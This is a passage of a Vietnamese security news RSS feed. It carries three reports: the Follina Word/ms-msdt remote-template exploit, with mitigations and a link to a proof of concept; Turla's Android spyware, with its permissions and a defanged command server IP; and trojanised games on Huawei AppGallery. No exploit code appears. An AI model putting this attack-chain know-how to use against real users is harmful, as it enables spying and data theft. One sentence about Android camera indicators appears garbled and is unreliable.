<p>&#8220;Lỗ hổng này sử dụng liên kết bên ngoài của Word để tải HTML và sau đó sử dụng scheme &#8216;ms-msdt&#8217; để thực thi mã PowerShell&#8221;. File Word có đính kèm mã độc sử dụng tính <a href="https://attack.mitre.org/techniques/T1221/" target="_blank" rel="noopener">remote template</a> của Word để tìm nạp File HTML từ máy chủ, sau đó sử dụng Schema URI &#8220;ms-msdt://&#8221; để tải mã độc về thực thi trên máy tính nạn nhân</p>
<p>Sở dĩ có tên gọi như vậy là do mẫu độc hại tham chiếu đến 0438, đây là mã vùng của Follina, một đô thị ở thành phố Treviso của Ý.<br />
Bạn có thể xem video PoC dưới đây:</p>
<div class="jeg_video_container jeg_video_content"><iframe loading="lazy" title="Maldoc .DOCX MSDT Inside Sandbox" width="500" height="281" src="https://www.youtube.com/embed/GybD70_rZDs?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></div>
<blockquote class="twitter-tweet" data-width="500" data-dnt="true">
<p lang="en" dir="ltr">MS-MSDT &quot;Follina&quot; Office click-to-hack. <a href="https://t.co/v0DOkQhZjq">pic.twitter.com/v0DOkQhZjq</a></p>
<p>&mdash; John Hammond (@_JohnHammond) <a href="https://twitter.com/_JohnHammond/status/1531125503725289472?ref_src=twsrc%5Etfw" rel="noopener">May 30, 2022</a></p></blockquote>
<p><script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p>Hiện  tác giả John Hammond đã công bố file <a href="https://github.com/anonyvietofficial/msdt-follina" rel="noopener">PoC trên Github</a>, bạn nào muốn nghiên cứu có thể tải về kiểm thử. Mình không khuyến khích sử dụng phương thức này để gửi các File Word có đính kèm mã độc cho người khác, như vậy sẽ vi phạm pháp luật.</p>
<h2>Cách ngăn chặn lỗ hổng Follina</h2>
<p>Hiện nay các phiên bản Office 2013, 2016, 2019, 2021 và Microsoft 365 trên cả Windows 10 và Windows 11 đều bị lỗ hổng này và Microsoft chưa có bản vá. Cách khắc phục tạm thời là tắt chế độ Preview trong Windows Explorer bằng cách  Mở Windows Explorer -&gt; View -&gt; tắt chỗ Preview Pane đi</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/05/31-05-2022-02-55-28.png"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/05/31-05-2022-02-55-28.png" alt="tắt chỗ Preview Pane đi" width="1394" height="198" title="Cảnh giác thủ đoạn đính kèm Virus vào File Word mới nhất 2022 57"></a>&#8211; Tải file <a href="https://drive.google.com/file/d/1KCO2XFWmEKJK83-_XH1qxOW6qQiwh2q_/view?usp=sharing" rel="noopener">unregister-msdt.reg</a> sau đó mở vào file để thiết lập và áp dụng trong Regedit. Nếu hiện lên cửa sổ User Account Control thì chọn <strong>Yes</strong>.</p>
<p>&#8211; Khi nhận file Word từ người khác hay tải từ Internet nên <a href="https://anonyviet.com/cach-kiem-tra-virus-cua-file-truoc-khi-download-voi-virustotal/">kiểm tra bằng Virustotal</a> xem có bị đính kèm mã độc không?</p>
<p>&#8211; Nếu nhận được một file Word, Excel hay PPT hãy tải lên Google Docs, Sheets hoặc Slides để xem Online thay vì dùng phần mềm Microsoft Office.</p>
<p style="text-align: right;"><em>Tin tổng hợp</em></p>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/canh-giac-thu-doan-dinh-kem-virus-vao-file-word-moi-nhat-2022/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Mã độc Turla Android của Nga phát tán để ghi âm, theo dõi vị trí người dùng</title>
		<link>https://anonyviet.com/ma-doc-android-cua-nga-phat-tan-de-ghi-am-theo-doi-vi-tri-nguoi-dung/</link>
					<comments>https://anonyviet.com/ma-doc-android-cua-nga-phat-tan-de-ghi-am-theo-doi-vi-tri-nguoi-dung/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 02 Apr 2022 09:04:43 +0000</pubDate>
				<category><![CDATA[Tin tức]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[hacker nga]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[mã độc android]]></category>
		<category><![CDATA[nga]]></category>
		<category><![CDATA[spyware]]></category>
		<category><![CDATA[turla]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=40650</guid>

					<description><![CDATA[Turla là một nhóm hack được nhà nước Nga hỗ trợ, nổi tiếng với việc sử dụng phần mềm độc hại tùy chỉnh để nhắm mục tiêu vào các hệ thống của châu Âu và Mỹ, chủ yếu để hoạt động gián điệp. Nhóm này đã phát tán mã độc Android gần đây có liên [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Turla là một nhóm hack được nhà nước Nga hỗ trợ, nổi tiếng với việc sử dụng phần mềm độc hại tùy chỉnh để nhắm mục tiêu vào các hệ thống của châu Âu và Mỹ, chủ yếu để hoạt động gián điệp. Nhóm này đã phát tán mã độc Android gần đây có liên quan đến Backdoor Sunburst được sử dụng trong cuộc tấn công chuỗi cung ứng SolarWinds vào tháng 12 năm 2020.</strong></p>
<p>Nhóm hack Turla có thể là thủ phạm đằng sau việc triển khai phần mềm gián điệp khét tiếng tấn công các thiết bị Android. Theo báo cáo mới nhất, các chuyên gia tin rằng nó đến từ các tin tặc do nhà nước Nga bảo trợ.</p>
<p>Ngoài việc sử dụng phần mềm độc hại này cho hoạt động gián điệp, mã độc này cũng có thể có quyền truy cập vào các tính năng khác của điện thoại của bạn, bao gồm internet, máy ảnh, tin nhắn&#8230;</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/04/Turla-Android-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/04/Turla-Android-1.jpg" alt="Turla Android" width="696" height="452" title="Mã độc Turla Android của Nga phát tán để ghi âm, theo dõi vị trí người dùng 61"></a></p>
<h2>Phần mềm gián điệp Turla Android?</h2>
<p>Các nhà nghiên cứu từ Lab52 đã xác định một APK độc hại [<a href="https://www.virustotal.com/gui/file/e0eacd72afe39de3b327a164f9c69a78c9c0f672d3ad202271772d816db4fad8" rel="noopener">VirusTotal</a>] có tên &#8220;Process Manager&#8221; hoạt động như phần mềm gián điệp Android, tải thông tin máy bị lây nhiễm về máy chủ của Hacker.</p>
<p>Mặc dù không rõ phần mềm gián điệp được phát tán như thế nào nhưng sau khi được cài đặt, Process Manager cố gắng ẩn trên thiết bị Android bằng biểu tượng hình bánh răng, giả vờ là một thành phần hệ thống.</p>
<p>Trong lần khởi chạy đầu tiên, ứng dụng sẽ nhắc người dùng cho phép nó sử dụng 18 quyền sau:</p>
<ul>
<li>Truy cập vị trí</li>
<li>Truy cập trạng thái mạng</li>
<li>Truy cập trạng thái WiFi</li>
<li>Caemera</li>
<li>Foreground service</li>
<li>Internet</li>
<li>Sửa đổi cài đặt âm thanh</li>
<li>Đọc nhật ký cuộc gọi</li>
<li>Đọc danh bạ</li>
<li>Đọc bộ nhớ ngoài</li>
<li>Ghi bộ nhớ ngoài</li>
<li>Đọc trạng thái điện thoại</li>
<li>Đọc tin nhắn SMS</li>
<li>Nhận trạng thái khởi động thành công</li>
<li>Gửi tin nhắn</li>
<li>Nhật ký mở máy</li>
</ul>
<p>Các quyền này là ảnh hưởng nghiêm trọng đối với quyền riêng tư vì nó cho phép ứng dụng lấy vị trí của thiết bị, gửi và đọc SMS, truy cập bộ nhớ, chụp ảnh bằng Camera và ghi âm.</p>
<p>Không rõ liệu phần mềm độc hại có lạm dụng dịch vụ Trợ năng của Android để tự cấp quyền cho chính nó hay nó lừa người dùng chấp thuận yêu cầu.</p>
<p>Sau khi nhận được quyền, phần mềm gián điệp sẽ xóa biểu tượng của nó và chạy trong nền chỉ với một thông báo đầu tiên sau đó biến mất đi.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/04/ma-doc-process-manager-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/04/ma-doc-process-manager-1.jpg" alt="ma doc process manager" width="438" height="236" title="Mã độc Turla Android của Nga phát tán để ghi âm, theo dõi vị trí người dùng 62"></a></p>
<p>Thông tin được thiết bị thu thập, bao gồm danh sách, nhật ký, SMS, bản ghi và thông báo sự kiện, được gửi ở định dạng JSON đến máy chủ của nhóm Hacker IP 82.146.35 [.] 240.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/04/may-chu-cc-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/04/may-chu-cc-1.jpg" alt="may chu cc " width="689" height="213" title="Mã độc Turla Android của Nga phát tán để ghi âm, theo dõi vị trí người dùng 63"></a></p>
<p>Phương thức phát tán file APK chưa được xác định, nhưng nếu đó là của nhóm Turla, họ thường sử dụng kỹ thuật social engineering, lừa đảo, tấn công lỗ hổng, v.v.</p>
<h2>Trường hợp lừa đảo nhận thưởng để tải App</h2>
<p>Trong khi nghiên cứu ứng dụng, nhóm Lab52 đã phát hiện rằng họ tải các mã độc xuống thiết bị và tìm thấy một trường hợp ứng dụng được tải trực tiếp từ Cửa hàng Play.</p>
<p>Ứng dụng được đặt tên là &#8220;Roz Dhan: Kiếm tiền mặt bằng Wallet&#8221; và đây là một ứng dụng phổ biến (10.000.000 lượt tải xuống) có hệ thống giới thiệu (ref) để nhận tiền. Ứng dụng này nghe có vẻ quá tốt vì người dùng có thể kiếm được tiền thông qua hệ thống giới thiệu.</p>
<p>Theo các nhà nghiên cứu an ninh mạng, khá kỳ lạ khi thực hiện mánh lới quảng cáo này vì mục tiêu chính của Hacker là theo dõi nạn nhân và đánh cắp thông tin.</p>
<h2>Ngăn chặn phần mềm độc hại</h2>
<p>Người dùng thiết bị Android nên xem lại các quyền ứng dụng đã cấp, điều này sẽ khá dễ dàng trên các phiên bản từ Android 10 trở lên và thu hồi những quyền không liên quan đến ứng dụng. Ví dụ đọc sms, dùng camera, ghi âm&#8230;.</p>
<p>Ngoài ra, bắt đầu từ Android 12, hệ điều hành sẽ đẩy các chỉ báo khi máy ảnh hoặc micrô đang hoạt động, vì vậy nếu những dấu hiệu này xuất hiện không có nghĩa là phần mềm gián điệp đang ẩn trong thiết bị của bạn.</p>
<p>Những công cụ này đặc biệt nguy hiểm khi nhúng vào bên trong các IoT chạy các phiên bản Android cũ, âm thầm đào tiền ảo tử điện thoại của bạn mà bạn không hề hay biết.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/ma-doc-android-cua-nga-phat-tan-de-ghi-am-theo-doi-vi-tri-nguoi-dung/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>9 triệu điện thoại Android bị nhiễm mã độc từ Huawei AppGallery</title>
		<link>https://anonyviet.com/9-trieu-dien-thoai-android-bi-nhiem-ma-doc-tu-huawei-appgallery/</link>
					<comments>https://anonyviet.com/9-trieu-dien-thoai-android-bi-nhiem-ma-doc-tu-huawei-appgallery/#respond</comments>
		
		<dc:creator><![CDATA[DeathGM]]></dc:creator>
		<pubDate>Sat, 27 Nov 2021 07:54:29 +0000</pubDate>
				<category><![CDATA[Tin tức]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[AppGallery]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[trojan]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=37507</guid>

					<description><![CDATA[Gần đây, các chuyên gia an ninh mạng của công ty Doctor Web đã tìm thấy gần 200 trò chơi có chứa Trojan “Android.Cynos.7.origin” bên trong. Trojan “Android.Cynos.7.origin” này được tìm thấy trong 190 trò chơi và có khoảng 9 triệu 3 trăm lượt tải xuống. Trojan này được thiết kế đặc biệt để lấy [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Gần đây, các chuyên gia an ninh mạng của công ty Doctor Web đã tìm thấy gần 200 trò chơi có chứa Trojan “Android.Cynos.7.origin” bên trong.</strong></p>
<p>Trojan “Android.Cynos.7.origin” này được tìm thấy trong 190 trò chơi và có khoảng 9 triệu 3 trăm lượt tải xuống. Trojan này được thiết kế đặc biệt để lấy dữ liệu như số điện thoại di động và các dữ liệu khác cho người đứng sau.</p>
<p><img decoding="async" class="aligncenter  size-medium" src="https://anonyviet.com/wp-content/uploads/2021/11/26-11-2021-09-11-20-300x91.png" alt="9 triệu điện thoại Android chạy Apps chứa Malware từ Huawei’s AppGallery" width="300" height="91" title="9 triệu điện thoại Android bị nhiễm mã độc từ Huawei AppGallery 66"></p>
<h2>Dữ Liệu Đã Thu Thập</h2>
<p>Tất cả những trò chơi chứa Trojan này chủ yếu nhắm vào đối tượng là trẻ em vì trẻ em là mục tiêu dễ dàng để tiếp cận vì bọn trẻ không thể nhận thức được cái này độc hại, gây hại cho nên rất dễ dàng để có thể đánh cắp dữ liệu. Sau khi người dùng cấp quyền cho các trò chơi này thì dữ liệu sẽ được thu thập và được gửi đến một remote server.<img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/11/26-11-2021-09-02-08.png" alt="9 triệu điện thoại Android bị nhiễm mã độc từ Huawei AppGallery 32" width="451" height="208" title="9 triệu điện thoại Android bị nhiễm mã độc từ Huawei AppGallery 67"></p>
<p>Dữ liệu đã thu thập:</p>
<ul>
<li>Số điện thoại của bạn</li>
<li>Vị trí của thiết bị dựa trên GPS, dữ liệu di động và điểm truy cập Wifi</li>
<li>Các thông tin của mạng di động ( sim): mã mạng, mã quốc gia , ID GSM, mã vùng GSM quốc tế.</li>
<li>Các thông số của thiết bị.</li>
<li>Một số phiên bản của nó có chức năng khá mạnh: chúng gửi SMS tốn tiền, chặn SMS đến, tải xuống và khởi chạy các mô-đun bổ sung, đồng thời tải xuống và cài đặt các ứng dụng khác. Chức năng chính của phiên bản được các nhà phân tích phần mềm độc hại phát hiện là thu thập thông tin về người dùng và thiết bị của họ và hiển thị quảng cáo.</li>
</ul>
<h2>Các ứng dụng bị ảnh hưởng</h2>
<p>Có khoảng 190 trò chơi trên Huawei AppGallery có trojan tích hợp trong một số danh mục bao gồm:</p>
<ol>
<li>Simulators</li>
<li>Platforms</li>
<li>Arcades</li>
<li>Strategies</li>
<li>Shooters and others</li>
</ol>
<p>Tổng cộng có hơn 9 triệu người dùng đã tải xuống các trò chơi này. Một số trò chơi này nhắm mục tiêu đến người dùng Nga, trong khi một số trò chơi khác nhắm mục tiêu đến khán giả Trung Quốc hoặc quốc tế.</p>
<p>Hiện tại thì tất cả các trò chơi bị dính Trojan này đã được Huawei xóa khỏi kho ứng dụng AppGallery. Tuy nhiên, nếu bạn đang sử dụng một chiếc điện thoại nào đó thuộc Huawei hoặc tải game nào đó trên app store của  Huawei hoặc tải apk và vô tình bọn cung cấp apk lấy từ bên AppGallery và bạn không chắc mình có bị dính Trojan này hay không, thì bạn có thể xem một số trò chơi bị dính ở bên dưới:</p>
<ul>
<li>“[Команда должна убить боеголовку]” với hơn 8000 lượt cài đặt.</li>
<li>“Cat game room” với hơn427000 lượt cài đặt.</li>
<li>“Drive school simulator” với hơn 142000 lượt cài đặt.</li>
<li>“[快点躲起来]” với hơn 2000000 lượt cài đặt.</li>
</ul>
<div class="TnITTtw-tpart TnITTtw-t">Nếu bạn muốn có danh sách đầy đủ các ứng dụng bị dính trojan này thì bạn có thể nhấp vào <a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Cynos/README.adoc" rel="noopener">đây</a> để có thể kiểm tra và nếu như điện thoại của bạn đang cài đặt thì hãy xoá nó đi nhé.</div>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/9-trieu-dien-thoai-android-bi-nhiem-ma-doc-tu-huawei-appgallery/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
